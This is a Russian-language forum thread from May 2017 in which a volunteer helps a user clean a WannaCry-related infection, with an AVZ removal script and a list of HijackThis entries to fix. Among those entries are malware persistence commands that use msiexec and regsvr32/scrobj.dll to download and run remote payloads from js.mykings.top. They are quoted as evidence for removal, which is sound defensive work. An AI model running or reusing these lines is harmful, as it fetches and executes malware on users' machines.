WNCRY.exe

[Dysyndyst]

Здравствуйте, проблема такая же как и у  всех,

Изменено 13 мая, 2017 пользователем Dysyndyst

[Mark D. Pearlstone]

Порядок оформления запроса о помощи

[Dysyndyst]

Прошу прощения за неправильное оформление 

CollectionLog-2017.05.13-13.44.zip

[regist]

Здравствуйте!

1) - Проведите эту процедуру. Полученную ссылку после загрузки карантина virusinfo_auto_имя_вашего_ПК.zip через данную форму напишите в своём в сообщении здесь.

 

2)

SpyHunter 4 [2017/05/12 22:45:00]-->C:\Users\Павел\AppData\Roaming\Enigma Software Group\sh_installer.exe -r sh

Удалите.

3)

Закройте все программы, временно выгрузите антивирус, файрволл и прочее защитное ПО.

Выполните скрипт в АВЗ (Файл - Выполнить скрипт):
 

begin
 ExecuteFile('net.exe', 'stop tcpip /y', 0, 15000, true);
 ClearQuarantineEx(true);
 SetServiceStart('mssecsvc2.0', 4);
 StopService('mssecsvc2.0');
 DeleteFile('C:\WINDOWS\mssecsvc.exe', '32');
 ExecuteFile('schtasks.exe', '/delete /TN "Mysa" /F', 0, 15000, true);
 DeleteService('SpyHunter 4 Service');
 DeleteService('mssecsvc2.0');
 RegKeyParamDel('HKEY_LOCAL_MACHINE', 'Software\Microsoft\Windows\CurrentVersion\Run', 'start');
 RegKeyParamDel('HKEY_LOCAL_MACHINE', 'Software\Microsoft\Windows\CurrentVersion\Run', 'start1');
 CreateQurantineArchive(GetAVZDirectory + 'quarantine.zip');
ExecuteSysClean;
RebootWindows(true);
end.

После выполнения скрипта компьютер перезагрузится.

4)  - Файл quarantine.zip из папки AVZ отправьте по адресу newvirus@kaspersky.com
Полученный ответ сообщите здесь (с указанием номера KLAN)

 

5)  "Пофиксите" в HijackThis (некоторые строки могут отсутствовать):

O4 - HKLM\..\Run: [start1] C:\Windows\system32\msiexec.exe /i http://js.mykings.top:280/helloworld.msi /q
O4 - HKLM\..\Run: [start] C:\Windows\system32\regsvr32.exe /u /s /i:http://js.mykings.top:280/v.sct scrobj.dll
O4 - HKU\S-1-5-18\..\RunOnce: [{80655FC2-A38F-4B8C-8775-9A3C68A6C305}] C:\Program Files (x86)\MSI\Live Update\LU5\DL_FILE\Killer_Network_Drivers_1.1.42.1045\Setup.exe /silent (file missing)
O4 - MSConfig\startupreg: [BNM Updater] C:\Users\Павел\AppData\Local\Beeline Network Manager\updater\chp.exe cmd.exe /c ""C:\Users\Павел\AppData\Local\Beeline Network Manager\updater\bash-run.bat" "beeline-wizard-updater"" (file missing) (HKLM) (2014/09/13)
O4 - MSConfig\startupreg: [EPLTarget] (no file)  (2014/09/13)
O21 - ShellIconOverlayIdentifiers: 00asw - {472083B0-C522-11CF-8763-00608CC02F24} - (no file)
O21 - ShellIconOverlayIdentifiers: 00avast - {472083B0-C522-11CF-8763-00608CC02F24} - (no file)
O22 - Task (Ready): Avast Emergency Update - C:\Program Files\AVAST Software\Avast\AvEmUpdate.exe (file missing)
O22 - Task (Ready): ParetoLogic Update Version3 - C:\Program Files (x86)\Common Files\ParetoLogic\UUS3\Pareto_Update3.exe (file missing)
O22 - Task (Ready): ParetoLogic Update Version3 Startup Task - C:\Program Files (x86)\Common Files\ParetoLogic\UUS3\Pareto_Update3.exe -StartupTask (file missing)
O22 - Task (Ready): SafeZone scheduled Autoupdate 1468305763 - C:\Program Files\AVAST Software\SZBrowser\launcher.exe --scheduledautoupdate $(Arg0) (file missing)
O22 - Task (Ready): \AVAST Software\Avast settings backup - C:\Program Files\Common Files\AV\avast! Antivirus\backup.exe /backup /iavs (file missing)
O22 - Task (Ready): {485346E6-1024-41D8-A0CD-4CA331E36AE9} - C:\Users\Павел\Desktop\directx_Jun2010_redist.exe (file missing)
O22 - Task (Ready): {4AEA447C-98A5-44D0-9CA5-635AD6037838} - G:\Program Files (x86)\From Dust\Titanfall2\__Installer\vc\vc2010sp1\redist\vcredist_x64.exe (file missing)
O22 - Task (Ready): {76A32D2F-D274-4D1D-9B7C-5E3539B3A29E} - G:\Games\Dark Souls III\Game\DarkSoulsIII.exe (file missing)

 
5) Повторите логи по правилам. Для повторной диагностики запустите снова Autologger. Для повторной диагностики запустите снова Autologger.